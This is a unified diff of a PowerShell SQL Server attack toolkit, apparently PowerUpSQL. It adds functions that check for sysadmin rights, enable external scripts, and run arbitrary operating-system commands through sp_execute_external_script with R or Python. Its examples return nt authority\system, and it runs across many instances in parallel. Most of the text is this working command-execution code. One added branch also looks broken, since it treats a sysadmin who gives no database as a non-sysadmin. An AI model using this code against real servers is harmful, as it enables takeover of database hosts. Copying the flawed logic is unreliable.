SERVERPROPERTY('productversion') as [SQLServerVersionNumber], - SUBSTRING(@@VERSION, CHARINDEX('2', @@VERSION), 4) as [SQLServerMajorVersion], - serverproperty('Edition') as [SQLServerEdition], - SERVERPROPERTY('ProductLevel') AS [SQLServerServicePack], - SUBSTRING(@@VERSION, CHARINDEX('x', @@VERSION), 3) as [OSArchitecture], - $SysadminQuery - RIGHT(SUBSTRING(@@VERSION, CHARINDEX('Windows NT', @@VERSION), 14), 3) as [OsVersionNumber], - SYSTEM_USER as [Currentlogin], - '$IsSysadmin' as [IsSysadmin], - '$ActiveSessions' as [ActiveSessions]" - # Execute Query - $TblServerInfoTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - - # Append as needed - $TblServerInfo = $TblServerInfo + $TblServerInfoTemp - } - - End - { - # Return data - $TblServerInfo - } -} - - -# ---------------------------------- -# Get-SQLServerInfoThreaded -# ---------------------------------- -# Author: Scott Sutherland -Function Get-SQLServerInfoThreaded -{ - <# - .SYNOPSIS - Returns basic server and user information from target SQL Servers. - .PARAMETER Username - SQL Server or domain account to authenticate with. - .PARAMETER Password - SQL Server or domain account password to authenticate with. - .PARAMETER Credential - SQL Server credential. - .PARAMETER Instance - SQL Server instance to connection to. - .PARAMETER Instance - Number of host threads. - .EXAMPLE - PS C:\> Get-SQLServerInfoThreaded -Instance SQLServer1\STANDARDDEV2014 - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DomainName : Domain - ServiceName : MSSQL$STANDARDDEV2014 - ServiceAccount : LocalSystem - AuthenticationMode : Windows and SQL Server Authentication - Clustered : No - SQLServerVersionNumber : 12.0.4213.0 - SQLServerMajorVersion : 2014 - SQLServerEdition : Developer Edition (64-bit) - SQLServerServicePack : SP1 - OSArchitecture : X64 - OsMachineType : WinNT - OSVersionName : Windows 8.1 Pro - OsVersionNumber : 6.3 - Currentlogin : Domain\MyUser - IsSysadmin : Yes - ActiveSessions : 1 - .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLServerInfoThreaded -Verbose -Threads 20 - #> - [CmdletBinding()] - Param( - [Parameter(Mandatory = $false, - HelpMessage = 'SQL Server or domain account to authenticate with.')] - [string]$Username, - - [Parameter(Mandatory = $false, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] - [string]$Password, - - [Parameter(Mandatory = $false, - HelpMessage = 'Windows credentials.')] - [System.Management.Automation.PSCredential] - [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, - - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server instance to connection to.')] - [string]$Instance, - - [Parameter(Mandatory = $false, - HelpMessage = 'Number of threads.')] - [int]$Threads = 5, - - [Parameter(Mandatory = $false, - HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] - [switch]$SuppressVerbose - ) - - Begin - { - # Setup data table for output - $TblServerInfo = New-Object -TypeName System.Data.DataTable - $null = $TblServerInfo.Columns.Add('ComputerName') - $null = $TblServerInfo.Columns.Add('Instance') - $null = $TblServerInfo.Columns.Add('DomainName') - $null = $TblServerInfo.Columns.Add('ServiceName') - $null = $TblServerInfo.Columns.Add('ServiceAccount') - $null = $TblServerInfo.Columns.Add('AuthenticationMode') - $null = $TblServerInfo.Columns.Add('Clustered') - $null = $TblServerInfo.Columns.Add('SQLServerVersionNumber') - $null = $TblServerInfo.Columns.Add('SQLServerMajorVersion') - $null = $TblServerInfo.Columns.Add('SQLServerEdition') - $null = $TblServerInfo.Columns.Add('SQLServerServicePack') - $null = $TblServerInfo.Columns.Add('OSArchitecture') - $null = $TblServerInfo.Columns.Add('OsMachineType') - $null = $TblServerInfo.Columns.Add('OSVersionName') - $null = $TblServerInfo.Columns.Add('OsVersionNumber') - $null = $TblServerInfo.Columns.Add('Currentlogin') - $null = $TblServerInfo.Columns.Add('IsSysadmin') - $null = $TblServerInfo.Columns.Add('ActiveSessions') # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable @@ -1580,210 +1798,280 @@ Function Get-SQLServerInfoThreaded $Instance = $env:COMPUTERNAME } - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) + # Setup DAC string + if($DAC) { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - } + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut } else { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." - } - return - } + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut + } - # Get number of active sessions for server - $ActiveSessions = Get-SQLSession -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | - Where-Object -FilterScript { - $_.SessionStatus -eq 'running' - } | - Measure-Object -Line | - Select-Object -Property Lines -ExpandProperty Lines + # Attempt connection + try + { + # Open connection + $Connection.Open() - # Get sysadmin status - $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } - if($IsSysadmin -eq 'Yes') - { - # Grab additional information if sysadmin - $SysadminSetup = " - -- Get machine type - DECLARE @MachineType SYSNAME - EXECUTE master.dbo.xp_regread - @rootkey = N'HKEY_LOCAL_MACHINE', - @key = N'SYSTEM\CurrentControlSet\Control\ProductOptions', - @value_name = N'ProductType', - @value = @MachineType output + # Switch to track external scripting status + $DisableShowAdvancedOptions = 0 + $DisableExternalScripts = 0 - -- Get OS version - DECLARE @ProductName SYSNAME - EXECUTE master.dbo.xp_regread - @rootkey = N'HKEY_LOCAL_MACHINE', - @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion', - @value_name = N'ProductName', - @value = @ProductName output" + # Check version, 2016 or later - $SysadminQuery = ' @MachineType as [OsMachineType], - @ProductName as [OSVersionName],' - } - else - { - $SysadminSetup = '' - $SysadminQuery = '' - } + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - # Define Query - $Query = " -- Get SQL Server Information + # Check if external scripting is enabled + if($IsSysadmin -eq 'Yes') + { + Write-Verbose -Message "$Instance : You are a sysadmin." + $IsExternalScriptsEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'external scripts enabled'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + } + else + { + Write-Verbose -Message "$Instance : You are not a sysadmin. This command requires sysadmin privileges." - -- Get SQL Server Service Name and Path - DECLARE @SQLServerInstance varchar(250) - DECLARE @SQLServerServiceName varchar(250) - if @@SERVICENAME = 'MSSQLSERVER' - BEGIN - set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' - set @SQLServerServiceName = 'MSSQLSERVER' - END - ELSE - BEGIN - set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$'+cast(@@SERVICENAME as varchar(250)) - set @SQLServerServiceName = 'MSSQL$'+cast(@@SERVICENAME as varchar(250)) - END + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'No sysadmin privileges.') + return + } - -- Get SQL Server Service Account - DECLARE @ServiceaccountName varchar(250) - EXECUTE master.dbo.xp_instance_regread - N'HKEY_LOCAL_MACHINE', @SQLServerInstance, - N'ObjectName',@ServiceAccountName OUTPUT, N'no_output' + # Enable show advanced options if needed + if ($IsShowAdvancedEnabled -eq 1) + { + Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." + } + else + { + Write-Verbose -Message "$Instance : Show Advanced Options is disabled." + $DisableShowAdvancedOptions = 1 - -- Get authentication mode - DECLARE @AuthenticationMode INT - EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', - N'Software\Microsoft\MSSQLServer\MSSQLServer', - N'LoginMode', @AuthenticationMode OUTPUT + # Try to enable Show Advanced Options + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - -- Grab additional information as sysadmin - $SysadminSetup + # Check if configuration change worked + $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value - -- Return server and version information - SELECT '$ComputerName' as [ComputerName], - @@servername as [Instance], - DEFAULT_DOMAIN() as [DomainName], - @SQLServerServiceName as [ServiceName], - @ServiceAccountName as [ServiceAccount], - (SELECT CASE @AuthenticationMode - WHEN 1 THEN 'Windows Authentication' - WHEN 2 THEN 'Windows and SQL Server Authentication' - ELSE 'Unknown' - END) as [AuthenticationMode], - CASE SERVERPROPERTY('IsClustered') - WHEN 0 - THEN 'No' - ELSE 'Yes' - END as [Clustered], - SERVERPROPERTY('productversion') as [SQLServerVersionNumber], - SUBSTRING(@@VERSION, CHARINDEX('2', @@VERSION), 4) as [SQLServerMajorVersion], - serverproperty('Edition') as [SQLServerEdition], - SERVERPROPERTY('ProductLevel') AS [SQLServerServicePack], - SUBSTRING(@@VERSION, CHARINDEX('x', @@VERSION), 3) as [OSArchitecture], - $SysadminQuery - RIGHT(SUBSTRING(@@VERSION, CHARINDEX('Windows NT', @@VERSION), 14), 3) as [OsVersionNumber], - SYSTEM_USER as [Currentlogin], - '$IsSysadmin' as [IsSysadmin], - '$ActiveSessions' as [ActiveSessions]" - # Execute Query - $TblServerInfoTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + if ($IsShowAdvancedEnabled2 -eq 1) + { + Write-Verbose -Message "$Instance : Enabled Show Advanced Options." + } + else + { + Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." - # Append as needed - $TblServerInfoTemp | - ForEach-Object -Process { - # Add row - $null = $TblServerInfo.Rows.Add( - $_.ComputerName, - $_.Instance, - $_.DomainName, - $_.ServiceName, - $_.ServiceAccount, - $_.AuthenticationMode, - $_.Clustered, - $_.SQLServerVersionNumber, - $_.SQLServerMajorVersion, - $_.SQLServerEdition, - $_.SQLServerServicePack, - $_.OSArchitecture, - $_.OsMachineType, - $_.OSVersionName, - $_.OsVersionNumber, - $_.Currentlogin, - $_.IsSysadmin, - $_.ActiveSessions - ) + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Show Advanced Options.') + return + } + } + + # Enable external scripts if needed + if ($IsExternalScriptsEnabled -eq 1) + { + Write-Verbose -Message "$Instance : External scripts are already enabled." + } + else + { + Write-Verbose -Message "$Instance : External scripts enabled are disabled." + $DisableExternalScripts = 1 + + # Try to enable Ole Automation Procedures + Get-SQLQuery -Instance $Instance -Query "sp_configure 'external scripts enabled',1;RECONFIGURE WITH OVERRIDE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Check if configuration change worked + $IsExternalScriptsEnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure "external scripts enabled"' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + + if ($IsExternalScriptsEnabled2 -eq 1) + { + Write-Verbose -Message "$Instance : Enabled external scripts." + } + else + { + Write-Verbose -Message "$Instance : Enabling external scripts failed. Aborting." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable external scripts.') + + return + } + } + + # Check if the configuration has been change in the run state + $EnabledInRunValue = Get-SQLQuery -Instance $Instance -Query "SELECT value_in_use FROM master.sys.configurations WHERE name LIKE 'external scripts enabled'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -ExpandProperty value_in_use + if($EnabledInRunValue -eq 0){ + Write-Verbose -Message "$Instance : The 'external scripts enabled' setting is not enabled in runtime." + Write-Verbose -Message "$Instance : - The SQL Server service will need to be manually restarted for the change to take effect." + Write-Verbose -Message "$Instance : - Not recommended unless you're the DBA." + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'External scripts not enabled in runtime.') + return + }else{ + Write-Verbose -Message "$Instance : The 'external scripts enabled' setting is enabled in runtime.'" + } + + # Setup query to run command + write-verbose "$instance : Executing command: $Command" + $QueryCmdExecute = +@" +EXEC sp_execute_external_script + @language=N'R', + @script=N'OutputDataSet <- data.frame(shell("$Command",intern=T))' + WITH RESULT SETS (([Output] varchar(max))); +"@ + + # Execute query + $CmdResults = Get-SQLQuery -Instance $Instance -Query $QueryCmdExecute -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | select Output -ExpandProperty Output + + # Display results or add to final results table + if($RawResults) + { + $CmdResults + } + else + { + $null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults.trim()) + } + + # Restore external scripts state if needed + if($DisableExternalScripts -eq 1) + { + Write-Verbose -Message "$Instance : Disabling external scripts" + Get-SQLQuery -Instance $Instance -Query "sp_configure 'external scripts enabled',0;RECONFIGURE WITH OVERRIDE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Restore Show Advanced Options state if needed + if($DisableShowAdvancedOptions -eq 1) + { + Write-Verbose -Message "$Instance : Disabling Show Advanced Options" + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + } + catch + { + # Connection failed + + if(-not $SuppressVerbose) + { + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Connection Failed." + #Write-Verbose " Error: $ErrorMessage" + } + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible or Command Failed') } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue - return $TblServerInfo + return $TblResults } } # ---------------------------------- -# Get-SQLDatabase +# Invoke-SQLOSCmdPython # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLDatabase +# Reference: https://gist.github.com/james-otten/63389189ee73376268c5eb676946ada5 +Function Invoke-SQLOSCmdPython { <# .SYNOPSIS - Returns database information from target SQL Servers. + Execute command on the operating system as the SQL Server service account using the Python runtime language. + Supports threading, raw output, and table output. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. + .PARAMETER Database + Database that you have rights to execute commands. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. - .PARAMETER DatabaseName - Database name to filter for. - .PARAMETER NoDefaults - Only select non default databases. - .PARAMETER HasAccess - Only select databases the current user has access to. - .PARAMETER SysAdminOnly - Only select databases owned by a sysadmin. + .PARAMETER TimeOut + Connection time out. + .PARAMETER SuppressVerbose + Suppress verbose errors. Used when function is wrapped. + .PARAMETER Threads + Number of concurrent threads. + .PARAMETER Command + Operating command to be executed on the SQL Server. + .PARAMETER RawResults + Just show the raw results without the computer or instance name. .EXAMPLE - PS C:\> Get-SQLDatabase -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb + PS C:\> Get-SQLInstanceLocal | Invoke-SQLOSCmdPython -Verbose -Command "whoami" + VERBOSE: Creating runspace pool and session states + VERBOSE: MSSQLSRV04 : Connection Failed. + VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success. + VERBOSE: MSSQLSRV04\BOSCHSQL : You are not a sysadmin. This command requires sysadmin privileges. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is already enabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : external scripts are already enabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Running command: whoami + VERBOSE: MSSQLSRV04\SQLSERVER2016 : Connection Failed. + VERBOSE: Closing the runspace pool + + ComputerName Instance CommandResults + ------------ -------- -------------- + MSSQLSRV04 MSSQLSRV04\BOSCHSQL No sysadmin privileges. + MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 nt authority\system + MSSQLSRV04 MSSQLSRV04\SQLSERVER2016 Not Accessible - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseId : 7 - DatabaseName : testdb - DatabaseOwner : sa - OwnerIsSysadmin : 1 - is_trustworthy_on : True - is_db_chaining_on : False - is_broker_enabled : True - is_encrypted : False - is_read_only : False - create_date : 4/13/2016 4:27:36 PM - recovery_model_desc : FULL - FileName : C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\DATA\testdb.mdf - DbSizeMb : 3.19 - has_dbaccess : 1 .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLDatabase -Verbose + PS C:\> Invoke-SQLOSCmdPython -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Command "whoami" -RawResults + VERBOSE: Creating runspace pool and session states + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is disabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled Show Advanced Options. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : External scripts are disabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled external scripts. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Executing command: whoami + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling external scripts + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling Show Advanced Options + + nt authority\system + + VERBOSE: Closing the runspace pool + + .EXAMPLE + PS C:\> Invoke-SQLOSCmdPython -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Database trusted_db -Command "whoami" -RawResults + VERBOSE: Creating runspace pool and session states + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is disabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled Show Advanced Options. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : External scripts are disabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled external scripts. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Executing command: whoami + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling external scripts + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling Show Advanced Options + + nt authority\system + + VERBOSE: Closing the runspace pool #> [CmdletBinding()] Param( @@ -1794,6 +2082,10 @@ Function Get-SQLDatabase [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server database to connection to.')] + [string]$Database, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] @@ -1801,233 +2093,312 @@ Function Get-SQLDatabase [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipeline = $true, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Database name.')] - [string]$DatabaseName, + HelpMessage = 'Connect using Dedicated Admin Connection.')] + [Switch]$DAC, - [Parameter(Mandatory = $false, - HelpMessage = 'Only select non default databases.')] - [switch]$NoDefaults, + [Parameter(Mandatory = $true, + HelpMessage = 'OS command to be executed.')] + [String]$Command = "whoami", [Parameter(Mandatory = $false, - HelpMessage = 'Only select databases the current user has access to.')] - [switch]$HasAccess, + HelpMessage = 'Connection timeout.')] + [string]$TimeOut, [Parameter(Mandatory = $false, - HelpMessage = 'Only select databases owned by a sysadmin.')] - [switch]$SysAdminOnly, + HelpMessage = 'Number of threads.')] + [int]$Threads = 1, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] - [switch]$SuppressVerbose + [switch]$SuppressVerbose, + + [Parameter(Mandatory = $false, + HelpMessage = 'Just show the raw results without the computer or instance name.')] + [switch]$RawResults ) Begin { - # Create data tables for output + # Setup data table for output + $TblCommands = New-Object -TypeName System.Data.DataTable $TblResults = New-Object -TypeName System.Data.DataTable - $TblDatabases = New-Object -TypeName System.Data.DataTable - $null = $TblDatabases.Columns.Add('ComputerName') - $null = $TblDatabases.Columns.Add('Instance') - $null = $TblDatabases.Columns.Add('DatabaseId') - $null = $TblDatabases.Columns.Add('DatabaseName') - $null = $TblDatabases.Columns.Add('DatabaseOwner') - $null = $TblDatabases.Columns.Add('OwnerIsSysadmin') - $null = $TblDatabases.Columns.Add('is_trustworthy_on') - $null = $TblDatabases.Columns.Add('is_db_chaining_on') - $null = $TblDatabases.Columns.Add('is_broker_enabled') - $null = $TblDatabases.Columns.Add('is_encrypted') - $null = $TblDatabases.Columns.Add('is_read_only') - $null = $TblDatabases.Columns.Add('create_date') - $null = $TblDatabases.Columns.Add('recovery_model_desc') - $null = $TblDatabases.Columns.Add('FileName') - $null = $TblDatabases.Columns.Add('DbSizeMb') - $null = $TblDatabases.Columns.Add('has_dbaccess') + $null = $TblResults.Columns.Add('ComputerName') + $null = $TblResults.Columns.Add('Instance') + $null = $TblResults.Columns.Add('CommandResults') - # Setup database filter - if($DatabaseName) - { - $DatabaseFilter = " and a.name like '$DatabaseName'" - } - else - { - $DatabaseFilter = '' - } - # Setup NoDefault filter - if($NoDefaults) - { - $NoDefaultsFilter = " and a.name not in ('master','tempdb','msdb','model')" - } - else - { - $NoDefaultsFilter = '' - } + # Setup data table for pipeline threading + $PipelineItems = New-Object -TypeName System.Data.DataTable - # Setup HasAccess filter - if($HasAccess) - { - $HasAccessFilter = ' and HAS_DBACCESS(a.name)=1' - } - else + # set instance to local host by default + if(-not $Instance) { - $HasAccessFilter = '' + $Instance = $env:COMPUTERNAME } - # Setup owner is sysadmin filter - if($SysAdminOnly) - { - $SysAdminOnlyFilter = " and IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid))=1" - } - else + # Ensure provided instance is processed + if($Instance) { - $SysAdminOnlyFilter = '' + $ProvideInstance = New-Object -TypeName PSObject -Property @{ + Instance = $Instance + } } + + # Add instance to instance list + $PipelineItems = $PipelineItems + $ProvideInstance } Process { - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + # Create list of pipeline items + $PipelineItems = $PipelineItems + $_ + } - # Default connection to local default instance - if(-not $Instance) - { - $Instance = $env:COMPUTERNAME - } + End + { + # Define code to be multi-threaded + $MyScriptBlock = { + $Instance = $_.Instance - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) { - Write-Verbose -Message "$Instance : Connection Success." + $Instance = $env:COMPUTERNAME } - } - else - { - if( -not $SuppressVerbose) + + # Setup DAC string + if($DAC) { - Write-Verbose -Message "$Instance : Connection Failed." + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut } - return - } - - # Check version - $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber - if($SQLVersionFull) - { - $SQLVersionShort = $SQLVersionFull.Split('.')[0] - } - - # Base query - $QueryStart = " SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - a.database_id as [DatabaseId], - a.name as [DatabaseName], - SUSER_SNAME(a.owner_sid) as [DatabaseOwner], - IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid)) as [OwnerIsSysadmin], - a.is_trustworthy_on, - a.is_db_chaining_on," - - # Version specific columns - if([int]$SQLVersionShort -ge 10) - { - $QueryVerSpec = ' - a.is_broker_enabled, - a.is_encrypted, - a.is_read_only,' - } - - # Query end - $QueryEnd = ' - a.create_date, - a.recovery_model_desc, - b.filename as [FileName], - (SELECT CAST(SUM(size) * 8. / 1024 AS DECIMAL(8,2)) - from sys.master_files where name like a.name) as [DbSizeMb], - HAS_DBACCESS(a.name) as [has_dbaccess] - FROM [sys].[databases] a - INNER JOIN [sys].[sysdatabases] b ON a.database_id = b.dbid WHERE 1=1' - - # User defined filters - $Filters = " - $DatabaseFilter - $NoDefaultsFilter - $HasAccessFilter - $SysAdminOnlyFilter - ORDER BY a.database_id" - - $Query = "$QueryStart $QueryVerSpec $QueryEnd $Filters" - - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - - # Append results for pipeline items - $TblResults | - ForEach-Object -Process { - # Set version specific values - if([int]$SQLVersionShort -ge 10) + # Setup database string + if($Database) { - $is_broker_enabled = $_.is_broker_enabled - $is_encrypted = $_.is_encrypted - $is_read_only = $_.is_read_only + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Database $Database -Credential $Credential -TimeOut $TimeOut } else { - $is_broker_enabled = 'NA' - $is_encrypted = 'NA' - $is_read_only = 'NA' + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut } - $null = $TblDatabases.Rows.Add( - $_.ComputerName, - $_.Instance, - $_.DatabaseId, - $_.DatabaseName, - $_.DatabaseOwner, - $_.OwnerIsSysadmin, - $_.is_trustworthy_on, - $_.is_db_chaining_on, - $is_broker_enabled, - $is_encrypted, - $is_read_only, - $_.create_date, - $_.recovery_model_desc, - $_.FileName, - $_.DbSizeMb, - $_.has_dbaccess - ) - } + # Attempt connection + try + { + # Open connection + $Connection.Open() - } + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } - End - { - # Return data - $TblDatabases - } -} + # Switch to track external scripting status + $DisableShowAdvancedOptions = 0 + $DisableExternalScripts = 0 + # Check version, 2016 or later -# ---------------------------------- -# Get-SQLDatabaseThreaded -# ---------------------------------- + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + + # Check if external scripting is enabled + if($IsSysadmin -eq 'Yes') + { + Write-Verbose -Message "$Instance : You are a sysadmin." + $IsExternalScriptsEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'external scripts enabled'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + } + if($Database) + { + Write-Verbose -Message "$Instance : Executing on $Database" + $IsExternalScriptsEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'external scripts enabled'" -Username $Username -Password $Password -Database $Database -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Database $Database -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + } + else + { + Write-Verbose -Message "$Instance : You are not a sysadmin. This command requires sysadmin privileges." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'No sysadmin privileges.') + return + } + + # Enable show advanced options if needed + if ($IsShowAdvancedEnabled -eq 1) + { + Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." + } + else + { + Write-Verbose -Message "$Instance : Show Advanced Options is disabled." + $DisableShowAdvancedOptions = 1 + + # Try to enable Show Advanced Options + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Check if configuration change worked + $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + + if ($IsShowAdvancedEnabled2 -eq 1) + { + Write-Verbose -Message "$Instance : Enabled Show Advanced Options." + } + else + { + Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Show Advanced Options.') + return + } + } + + # Enable external scripts 